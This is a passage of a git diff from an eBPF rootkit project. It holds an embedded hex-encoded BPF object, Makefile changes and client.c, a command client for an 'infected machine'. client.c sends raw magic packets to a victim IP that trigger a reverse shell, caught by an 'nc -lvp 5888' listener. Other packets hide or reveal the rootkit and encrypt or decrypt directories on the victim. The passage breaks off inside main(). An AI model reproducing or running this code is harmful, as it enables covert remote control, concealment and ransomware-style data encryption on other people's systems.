\x6f\x74\x6f\x63\x6f\x6c\x20\x21\x3d\x20\x49\x50\x50\x52\x4f\x54\x4f\x5f\x55\ \x3e\x64\x61\x74\x61\x5f\x65\x6e\x64\x3b\0\x20\x20\x20\x20\x69\x66\x20\x28\x28\
\x44\x50\x29\0\x20\x20\x20\x20\x69\x66\x20\x28\x75\x64\x70\x2d\x3e\x64\x65\x73\ \x76\x6f\x69\x64\x20\x2a\x29\x65\x74\x68\x20\x2b\x20\x73\x69\x7a\x65\x6f\x66\
\x74\x20\x21\x3d\x20\x6e\x74\x6f\x68\x73\x28\x35\x30\x30\x35\x29\x29\0\x20\x20\ \x28\x2a\x65\x74\x68\x29\x20\x3e\x20\x64\x61\x74\x61\x5f\x65\x6e\x64\x29\0\x20\
\x20\x20\x69\x66\x20\x28\x70\x61\x79\x6c\x6f\x61\x64\x5f\x73\x69\x7a\x65\x20\ \x20\x20\x20\x69\x66\x20\x28\x69\x70\x2d\x3e\x70\x72\x6f\x74\x6f\x63\x6f\x6c\
\x21\x3d\x20\x73\x69\x7a\x65\x6f\x66\x28\x6d\x61\x74\x63\x68\x5f\x70\x61\x74\ \x20\x21\x3d\x20\x49\x50\x50\x52\x4f\x54\x4f\x5f\x55\x44\x50\x29\0\x20\x20\x20\
\x74\x65\x72\x6e\x29\x20\x2d\x20\x31\x29\x20\0\x20\x20\x20\x20\x20\x20\x20\x20\ \x20\x69\x66\x20\x28\x75\x64\x70\x2d\x3e\x64\x65\x73\x74\x20\x21\x3d\x20\x6e\
\x69\x66\x20\x28\x70\x61\x79\x6c\x6f\x61\x64\x5b\x69\x5d\x20\x21\x3d\x20\x6d\ \x74\x6f\x68\x73\x28\x35\x30\x30\x35\x29\x29\0\x20\x20\x20\x20\x69\x66\x20\x28\
\x61\x74\x63\x68\x5f\x70\x61\x74\x74\x65\x72\x6e\x5b\x69\x5d\x29\0\x7d\0\x63\ \x70\x61\x79\x6c\x6f\x61\x64\x5f\x73\x69\x7a\x65\x20\x21\x3d\x20\x73\x69\x7a\
\x68\x61\x72\0\x4c\x49\x43\x45\x4e\x53\x45\0\x2e\x6d\x61\x70\x73\0\x6c\x69\x63\ \x65\x6f\x66\x28\x6d\x61\x74\x63\x68\x5f\x70\x61\x74\x74\x65\x72\x6e\x29\x20\
\x65\x6e\x73\x65\0\x9f\xeb\x01\0\x20\0\0\0\0\0\0\0\x14\0\0\0\x14\0\0\0\x1c\x01\ \x2d\x20\x31\x29\x20\0\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x28\x70\x61\
\0\0\x30\x01\0\0\0\0\0\0\x08\0\0\0\x9d\0\0\0\x01\0\0\0\0\0\0\0\x0e\0\0\0\x10\0\ \x79\x6c\x6f\x61\x64\x5b\x69\x5d\x20\x21\x3d\x20\x6d\x61\x74\x63\x68\x5f\x70\
\0\0\x9d\0\0\0\x11\0\0\0\0\0\0\0\xa1\0\0\0\xcd\0\0\0\x25\xd0\0\0\x08\0\0\0\xa1\ \x61\x74\x74\x65\x72\x6e\x5b\x69\x5d\x29\0\x7d\0\x20\x20\x20\x20\x62\x70\x66\
\0\0\0\xf7\0\0\0\x29\xcc\0\0\x10\0\0\0\xa1\0\0\0\x29\x01\0\0\x15\x0c\x01\0\x20\ \x5f\x70\x72\x69\x6e\x74\x6b\x28\x22\x42\x50\x46\x20\x66\x69\x6e\x69\x73\x68\
\0\0\0\xa1\0\0\0\x29\x01\0\0\x09\x0c\x01\0\x50\0\0\0\xa1\0\0\0\x58\x01\0\0\x09\ \x65\x64\x5c\x6e\x20\x22\x29\x3b\0\x63\x68\x61\x72\0\x5f\x5f\x41\x52\x52\x41\
\x28\x01\0\x68\0\0\0\xa1\0\0\0\x7d\x01\0\0\x0e\x44\x01\0\x70\0\0\0\xa1\0\0\0\ \x59\x5f\x53\x49\x5a\x45\x5f\x54\x59\x50\x45\x5f\x5f\0\x4c\x49\x43\x45\x4e\x53\
\x7d\x01\0\0\x09\x44\x01\0\x88\0\0\0\xa1\0\0\0\x9f\x01\0\0\x09\x5c\x01\0\xa0\0\ \x45\0\x78\x64\x70\x5f\x72\x65\x63\x65\x69\x76\x65\x2e\x5f\x5f\x5f\x5f\x66\x6d\
\0\0\xa1\0\0\0\xd3\x01\0\0\x0d\x84\x01\0\xa8\0\0\0\xa1\0\0\0\xd3\x01\0\0\x0d\ \x74\0\x78\x64\x70\x5f\x72\x65\x63\x65\x69\x76\x65\x2e\x5f\x5f\x5f\x5f\x66\x6d\
\x84\x01\0\xb0\0\0\0\xa1\0\0\0\xff\x01\0\0\x01\xbc\x01\0\xc0\0\0\0\xa1\0\0\0\ \x74\x2e\x31\0\x2e\x72\x6f\x64\x61\x74\x61\0\x6c\x69\x63\x65\x6e\x73\x65\0\x9f\
\xd3\x01\0\0\x0d\x84\x01\0\xc8\0\0\0\xa1\0\0\0\xd3\x01\0\0\x0d\x84\x01\0\xd8\0\ \xeb\x01\0\x20\0\0\0\0\0\0\0\x14\0\0\0\x14\0\0\0\x4c\x01\0\0\x60\x01\0\0\0\0\0\
\0\0\xa1\0\0\0\xd3\x01\0\0\x0d\x84\x01\0\xe0\0\0\0\xa1\0\0\0\xd3\x01\0\0\x0d\ \0\x08\0\0\0\x75\0\0\0\x01\0\0\0\0\0\0\0\x07\0\0\0\x10\0\0\0\x75\0\0\0\x14\0\0\
\x84\x01\0\xe8\0\0\0\xa1\0\0\0\xd3\x01\0\0\x0d\x84\x01\0\xf8\0\0\0\xa1\0\0\0\ \0\0\0\0\0\x7e\0\0\0\xaa\0\0\0\0\xc4\0\0\x08\0\0\0\x7e\0\0\0\xce\0\0\0\x05\xcc\
\xd3\x01\0\0\x0d\x84\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\ \0\0\x30\0\0\0\x7e\0\0\0\xf1\0\0\0\x25\xd8\0\0\x38\0\0\0\x7e\0\0\0\x1b\x01\0\0\
\0\0\x7a\0\0\0\0\0\x02\0\xd8\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x72\0\0\0\0\0\x02\0\ \x29\xd4\0\0\x40\0\0\0\x7e\0\0\0\x4d\x01\0\0\x15\x14\x01\0\x50\0\0\0\x7e\0\0\0\
\x08\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x6b\0\0\0\0\0\x02\0\xc0\0\0\0\0\0\0\0\0\0\ \x4d\x01\0\0\x09\x14\x01\0\x80\0\0\0\x7e\0\0\0\x7c\x01\0\0\x09\x30\x01\0\x98\0\
\0\0\0\0\0\0\x64\0\0\0\0\0\x02\0\xb0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x03\ \0\0\x7e\0\0\0\xa1\x01\0\0\x0e\x4c\x01\0\xa0\0\0\0\x7e\0\0\0\xa1\x01\0\0\x09\
\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x5c\0\0\0\x11\0\x03\0\0\0\0\0\0\0\0\0\ \x4c\x01\0\xb8\0\0\0\x7e\0\0\0\xc3\x01\0\0\x09\x64\x01\0\xd0\0\0\0\x7e\0\0\0\
\x0d\0\0\0\0\0\0\0\x40\0\0\0\x11\0\x04\0\0\0\0\0\0\0\0\0\x10\0\0\0\0\0\0\0\x2c\ \xf7\x01\0\0\x0d\x90\x01\0\xd8\0\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x90\x01\0\xe0\0\
\0\0\0\x12\0\x02\0\0\0\0\0\0\0\0\0\x10\x01\0\0\0\0\0\0\x98\x01\0\0\0\0\0\0\0\0\ \0\0\x7e\0\0\0\x23\x02\0\0\x01\xcc\x01\0\xe8\0\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\
\0\0\x07\0\0\0\xb0\x01\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\x2c\0\0\0\0\0\0\0\0\0\0\0\ \x90\x01\0\xf0\0\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x90\x01\0\0\x01\0\0\x7e\0\0\0\
\x05\0\0\0\x40\0\0\0\0\0\0\0\0\0\0\0\x05\0\0\0\x50\0\0\0\0\0\0\0\0\0\0\0\x05\0\ \xf7\x01\0\0\x0d\x90\x01\0\x08\x01\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x90\x01\0\x10\
\0\0\x60\0\0\0\0\0\0\0\0\0\0\0\x05\0\0\0\x70\0\0\0\0\0\0\0\0\0\0\0\x05\0\0\0\ \x01\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x90\x01\0\x18\x01\0\0\x7e\0\0\0\xf7\x01\0\0\
\x80\0\0\0\0\0\0\0\0\0\0\0\x05\0\0\0\x90\0\0\0\0\0\0\0\0\0\0\0\x05\0\0\0\xa0\0\ \x0d\x90\x01\0\x20\x01\0\0\x7e\0\0\0\x25\x02\0\0\x05\x9c\x01\0\0\0\0\0\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\x05\0\0\0\xb0\0\0\0\0\0\0\0\0\0\0\0\x05\0\0\0\xc0\0\0\0\0\ \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xa4\0\0\0\0\0\x02\0\0\x01\0\0\0\0\
\0\0\0\0\0\0\0\x05\0\0\0\xd0\0\0\0\0\0\0\0\0\0\0\0\x05\0\0\0\xe0\0\0\0\0\0\0\0\ \0\0\0\0\0\0\0\0\0\0\x87\0\0\0\0\0\x02\0\xe8\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x80\
\0\0\0\0\x05\0\0\0\xf0\0\0\0\0\0\0\0\0\0\0\0\x05\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\ \0\0\0\0\0\x02\0\xe0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x14\0\0\0\x01\0\x04\0\0\0\0\
\0\x05\0\0\0\x10\x01\0\0\0\0\0\0\0\0\0\0\x05\0\0\0\x20\x01\0\0\0\0\0\0\0\0\0\0\ \0\0\0\0\0\x0f\0\0\0\0\0\0\0\x8e\0\0\0\x01\0\x04\0\x0f\0\0\0\0\0\0\0\x0f\0\0\0\
\x05\0\0\0\x30\x01\0\0\0\0\0\0\0\0\0\0\x05\0\0\0\x40\x01\0\0\0\0\0\0\0\0\0\0\ \0\0\0\0\0\0\0\0\x03\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x03\0\x04\
\x05\0\0\0\x0e\x0c\x0d\0\x2e\x74\x65\x78\x74\0\x2e\x72\x65\x6c\x2e\x42\x54\x46\ \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x78\0\0\0\x11\0\x03\0\0\0\0\0\0\0\0\0\x0d\0\
\x2e\x65\x78\x74\0\x2e\x6d\x61\x70\x73\0\x78\x64\x70\0\x2e\x6c\x6c\x76\x6d\x5f\ \0\0\0\0\0\0\x43\0\0\0\x12\0\x02\0\0\0\0\0\0\0\0\0\x50\x01\0\0\0\0\0\0\x08\0\0\
\x61\x64\x64\x72\x73\x69\x67\0\x78\x64\x70\x5f\x72\x65\x63\x65\x69\x76\x65\0\ \0\0\0\0\0\x01\0\0\0\x07\0\0\0\x20\x01\0\0\0\0\0\0\x01\0\0\0\x07\0\0\0\x60\x01\
\x6c\x69\x63\x65\x6e\x73\x65\0\x72\x62\0\x2e\x73\x74\x72\x74\x61\x62\0\x2e\x73\ \0\0\0\0\0\0\x0a\0\0\0\x07\0\0\0\x6c\x01\0\0\0\0\0\0\x0a\0\0\0\x07\0\0\0\x84\
\x79\x6d\x74\x61\x62\0\x2e\x72\x65\x6c\x2e\x42\x54\x46\0\x4c\x49\x43\x45\x4e\ \x01\0\0\0\0\0\0\0\0\0\0\x08\0\0\0\x2c\0\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\x40\0\0\
\x53\x45\0\x4c\x42\x42\x30\x5f\x39\0\x4c\x42\x42\x30\x5f\x37\0\x4c\x42\x42\x30\ \0\0\0\0\0\0\0\0\0\x06\0\0\0\x50\0\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\x60\0\0\0\0\0\
\x5f\x31\x33\0\x4c\x42\x42\x30\x5f\x31\x30\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\ \0\0\0\0\0\0\x06\0\0\0\x70\0\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\x80\0\0\0\0\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\ \0\0\0\x06\0\0\0\x90\0\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\xa0\0\0\0\0\0\0\0\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\x01\0\0\0\x06\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\ \x06\0\0\0\xb0\0\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\xc0\0\0\0\0\0\0\0\0\0\0\0\x06\0\
\x40\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x04\0\0\0\0\0\0\0\0\0\0\0\0\ \0\0\xd0\0\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\xe0\0\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\
\0\0\0\x1a\0\0\0\x01\0\0\0\x06\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x40\0\0\0\0\0\0\0\ \xf0\0\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\x10\
\x10\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x08\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x38\0\0\ \x01\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\x20\x01\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\x30\
\0\x01\0\0\0\x03\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x50\x01\0\0\0\0\0\0\x0d\0\0\0\0\ \x01\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\x40\x01\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\x50\
\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x14\0\0\0\x01\0\0\0\ \x01\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\x60\x01\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\x70\
\x03\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x60\x01\0\0\0\0\0\0\x10\0\0\0\0\0\0\0\0\0\0\ \x01\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\x0f\x0e\x05\x06\0\x2e\x74\x65\x78\x74\0\x2e\
\0\0\0\0\0\x08\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x57\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\ \x72\x65\x6c\x2e\x42\x54\x46\x2e\x65\x78\x74\0\x78\x64\x70\x5f\x72\x65\x63\x65\
\0\0\0\0\0\0\0\0\0\x70\x01\0\0\0\0\0\0\xd4\x03\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\ \x69\x76\x65\x2e\x5f\x5f\x5f\x5f\x66\x6d\x74\0\x2e\x72\x65\x6c\x78\x64\x70\x5f\
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x0b\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\ \x70\x72\x6f\x67\0\x2e\x6c\x6c\x76\x6d\x5f\x61\x64\x64\x72\x73\x69\x67\0\x78\
\0\0\x44\x05\0\0\0\0\0\0\x50\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\ \x64\x70\x5f\x72\x65\x63\x65\x69\x76\x65\0\x6c\x69\x63\x65\x6e\x73\x65\0\x2e\
\0\0\0\0\0\0\0\0\x4b\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x98\x06\0\ \x73\x74\x72\x74\x61\x62\0\x2e\x73\x79\x6d\x74\x61\x62\0\x2e\x72\x6f\x64\x61\
\0\0\0\0\0\xd8\0\0\0\0\0\0\0\x0b\0\0\0\x06\0\0\0\x08\0\0\0\0\0\0\0\x18\0\0\0\0\ \x74\x61\0\x2e\x72\x65\x6c\x2e\x42\x54\x46\0\x4c\x49\x43\x45\x4e\x53\x45\0\x4c\
\0\0\0\x53\0\0\0\x09\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x70\x07\0\0\0\0\0\0\ \x42\x42\x30\x5f\x39\0\x4c\x42\x42\x30\x5f\x37\0\x78\x64\x70\x5f\x72\x65\x63\
\x20\0\0\0\0\0\0\0\x07\0\0\0\x05\0\0\0\x08\0\0\0\0\0\0\0\x10\0\0\0\0\0\0\0\x07\ \x65\x69\x76\x65\x2e\x5f\x5f\x5f\x5f\x66\x6d\x74\x2e\x31\0\x4c\x42\x42\x30\x5f\
\0\0\0\x09\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x90\x07\0\0\0\0\0\0\x20\x01\0\ \x31\x30\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
\0\0\0\0\0\x07\0\0\0\x06\0\0\0\x08\0\0\0\0\0\0\0\x10\0\0\0\0\0\0\0\x1e\0\0\0\ \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\x01\0\0\
\x03\x4c\xff\x6f\0\0\0\x80\0\0\0\0\0\0\0\0\0\0\0\0\xb0\x08\0\0\0\0\0\0\x03\0\0\ \0\x06\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x40\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x43\0\0\0\x03\0\0\ \0\0\0\0\x04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x2c\0\0\0\x01\0\0\0\x06\0\0\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xb3\x08\0\0\0\0\0\0\x82\0\0\0\0\0\0\0\0\0\0\ \0\0\0\0\0\0\0\0\0\x40\0\0\0\0\0\0\0\x50\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x08\0\
\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"; \0\0\0\0\0\0\0\0\0\0\0\0\0\0\x4f\0\0\0\x01\0\0\0\x03\0\0\0\0\0\0\0\0\0\0\0\0\0\
\0\0\x90\x01\0\0\0\0\0\0\x0d\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\
\0\0\0\0\0\0\0\x67\0\0\0\x01\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x9d\x01\0\
\0\0\0\0\0\x1e\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
\x73\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xbb\x01\0\0\0\0\0\0\x2f\
\x04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x0b\0\0\0\
\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xea\x05\0\0\0\0\0\0\x80\x01\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x5f\0\0\0\x02\0\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x70\x07\0\0\0\0\0\0\xf0\0\0\0\0\0\0\0\x0c\0\0\0\
\x08\0\0\0\x08\0\0\0\0\0\0\0\x18\0\0\0\0\0\0\0\x28\0\0\0\x09\0\0\0\0\0\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\x60\x08\0\0\0\0\0\0\x20\0\0\0\0\0\0\0\x07\0\0\0\x02\0\0\0\
\x08\0\0\0\0\0\0\0\x10\0\0\0\0\0\0\0\x6f\0\0\0\x09\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
\0\0\0\0\0\x80\x08\0\0\0\0\0\0\x30\0\0\0\0\0\0\0\x07\0\0\0\x05\0\0\0\x08\0\0\0\
\0\0\0\0\x10\0\0\0\0\0\0\0\x07\0\0\0\x09\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
\xb0\x08\0\0\0\0\0\0\x50\x01\0\0\0\0\0\0\x07\0\0\0\x06\0\0\0\x08\0\0\0\0\0\0\0\
\x10\0\0\0\0\0\0\0\x35\0\0\0\x03\x4c\xff\x6f\0\0\0\x80\0\0\0\0\0\0\0\0\0\0\0\0\
\0\x0a\0\0\0\0\0\0\x04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\
\0\0\0\0\x57\0\0\0\x03\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x04\x0a\0\0\0\0\0\
\0\xac\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";
return 0; return 0;
err: err:

4
src/Makefile
View File

@@ -16,7 +16,7 @@ INCLUDES := -I$(OUTPUT) -I./libbpf/include/uapi -I/lib/modules/5.11.0-40-generic
CFLAGS := -g -Wall #-I/lib/modules/5.11.0-40-generic/build/include CFLAGS := -g -Wall #-I/lib/modules/5.11.0-40-generic/build/include
ARCH := $(shell uname -m | sed 's/x86_64/x86/') ARCH := $(shell uname -m | sed 's/x86_64/x86/')
APPS = xdp_filter APPS = xdp_filter bootstrap
# Get Clang's default includes on this system. We'll explicitly add these dirs # Get Clang's default includes on this system. We'll explicitly add these dirs
# to the includes list when compiling with `-target bpf` because otherwise some # to the includes list when compiling with `-target bpf` because otherwise some
@@ -64,7 +64,7 @@ $(LIBBPF_OBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(OUTPU
install install
# Build BPF code # Build BPF code
$(OUTPUT)/%.bpf.o: $(EBPF)/%.bpf.c $(LIBBPF_OBJ) $(wildcard $(EBPF)/%.h) $(VMLINUX) | $(OUTPUT) $(OUTPUT)/%.bpf.o: $(EBPF)/%.bpf.c $(LIBBPF_OBJ) $(wildcard $(EBPF)/%.h) | $(OUTPUT)
$(call msg,BPF,$@) $(call msg,BPF,$@)
$(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) -c $(filter %.c,$^) -o $@ $(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) -c $(filter %.c,$^) -o $@
$(Q)$(LLVM_STRIP) -g $@ # strip useless DWARF info $(Q)$(LLVM_STRIP) -g $@ # strip useless DWARF info

BIN
src/bin/minimal
View File

Binary file not shown.

BIN
src/bin/xdp_filter
View File

Binary file not shown.

16
src/client/Makefile Normal file
View File

@@ -0,0 +1,16 @@
CC = gcc
HEADERS = lib/RawTCP.h
EXTRA_CFLAGS= -I$(PWD)/lib
default:
make injector
client.o: client.c $(HEADERS)
gcc -c client.c
injector: client.o lib/libRawTCP_Lib.a
gcc -lm -o injector client.o -L. lib/libRawTCP_Lib.a
clean:
-rm -f client.o
-rm -f injector

294
src/client/client.c Normal file
View File

@@ -0,0 +1,294 @@
#include "lib/RawTCP.h"
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdlib.h>
// For printing with colors
#define KGRN "\x1B[32m"
#define KYLW "\x1B[33m"
#define KBLU "\x1B[34m"
#define KMGN "\x1B[35m"
#define KRED "\x1B[31m"
#define RESET "\x1B[0m"
void print_welcome_message(){
printf("*******************************************************\n");
printf("************************* TFG *************************\n");
printf("*******************************************************\n");
printf("************ https://github.com/h3xduck/TFG ***********\n");
printf("*******************************************************\n");
}
void print_help_dialog(const char* arg){
printf("\nUsage: %s OPTION victim_IP\n\n", arg);
printf("Program OPTIONs\n");
char* line = "-S";
char* desc = "Send a secret message to IP";
printf("\t%-40s %-50s\n\n", line, desc);
line = "-h";
desc = "Print this help";
printf("\t%-40s %-50s\n\n", line, desc);
}
void check_ip_address_format(char* address){
char* buf[256];
int s = inet_pton(AF_INET, address, buf);
if(s<0){
printf("["KYLW"WARN"RESET"]""Error checking IP validity\n");
}else if(s==0){
printf("["KYLW"WARN"RESET"]""The victim IP is probably not valid\n");
}
}
char* getLocalIpAddress(){
char hostbuffer[256];
char* IPbuffer = calloc(256, sizeof(char));
struct hostent *host_entry;
int hostname;
hostname = gethostname(hostbuffer, sizeof(hostbuffer));
if(hostname==-1){
perror("["KRED"ERROR"RESET"]""Error getting local IP: gethostname");
exit(1);
}
host_entry = gethostbyname(hostbuffer);
if(host_entry == NULL){
perror("["KRED"ERROR"RESET"]""Error getting local IP: gethostbyname");
exit(1);
}
// To convert an Internet network
// address into ASCII string
strcpy(IPbuffer,inet_ntoa(*((struct in_addr*) host_entry->h_addr_list[0])));
printf("["KBLU"INFO"RESET"]""Attacker IP selected: %s\n", IPbuffer);
return IPbuffer;
}
void get_shell(char* argv){
char* local_ip = getLocalIpAddress();
printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
check_ip_address_format(argv);
packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, "UMBRA_PAYLOAD_GET_REVERSE_SHELL");
printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
pid_t pid;
pid = fork();
if(pid < 0){
perror("["KRED"ERROR"RESET"]""Could not create another process");
return;
}else if(pid==0){
sleep(1);
//Sending the malicious payload
if(rawsocket_send(packet)<0){
printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");
}else{
printf("["KGRN"OK"RESET"]""Payload successfully sent!\n");
}
}else {
//Activating listener
char *cmd = "nc";
char *argv[4];
argv[0] = "nc";
argv[1] = "-lvp";
argv[2] = "5888";
argv[3] = NULL;
printf("["KBLU"INFO"RESET"]""Trying to get a shell...\n");
if(execvp(cmd, argv)<0){
perror("["KRED"ERROR"RESET"]""Error executing background listener");
return;
}
printf("["KGRN"OK"RESET"]""Got a shell\n");
}
free(local_ip);
}
void show_rootkit(char* argv){
char* local_ip = getLocalIpAddress();
printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
check_ip_address_format(argv);
packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, "UMBRA_SHOW_ROOTKIT");
printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
//Sending the malicious payload
if(rawsocket_send(packet)<0){
printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");
}else{
printf("["KGRN"OK"RESET"]""Request to unhide successfully sent!\n");
}
free(local_ip);
}
void hide_rootkit(char* argv){
char* local_ip = getLocalIpAddress();
printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
check_ip_address_format(argv);
packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, "UMBRA_HIDE_ROOTKIT");
printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
//Sending the malicious payload
if(rawsocket_send(packet)<0){
printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");
}else{
printf("["KGRN"OK"RESET"]""Request to hide successfully sent!\n");
}
free(local_ip);
}
void encrypt_directory(char* argv, char* dir){
char* local_ip = getLocalIpAddress();
printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
printf("["KBLU"INFO"RESET"]""Target PATH selected: %s\n", dir);
char data_buffer[1024];
strcpy(data_buffer, "UMBRA_ENCRYPT_DIR");
strcat(data_buffer, dir);
check_ip_address_format(argv);
packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, data_buffer);
printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
//Sending the malicious payload
if(rawsocket_send(packet)<0){
printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");
}else{
printf("["KGRN"OK"RESET"]""Request to encrypt directory successfully sent!\n");
}
free(local_ip);
}
void decrypt_directory(char* argv, char* dir){
char* local_ip = getLocalIpAddress();
printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
printf("["KBLU"INFO"RESET"]""Target PATH selected: %s\n", dir);
char data_buffer[1024];
strcpy(data_buffer, "UMBRA_DECRYPT_DIR");
strcat(data_buffer, dir);
check_ip_address_format(argv);
packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, data_buffer);
printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
//Sending the malicious payload
if(rawsocket_send(packet)<0){
printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");
}else{
printf("["KGRN"OK"RESET"]""Request to decrypt directory successfully sent!\n");
}
free(local_ip);
}
void main(int argc, char* argv[]){
if(argc<2){
printf("["KRED"ERROR"RESET"]""Invalid number of arguments\n");
print_help_dialog(argv[0]);
return;
}
int ENCRYPT_MODE_SEL = 0;
int DECRYPT_MODE_SEL = 0;
int PATH_ARG_PROVIDED = 0;
int PARAM_MODULE_ACTIVATED = 0;
int opt;
char dest_address[32];
char path_arg[512];
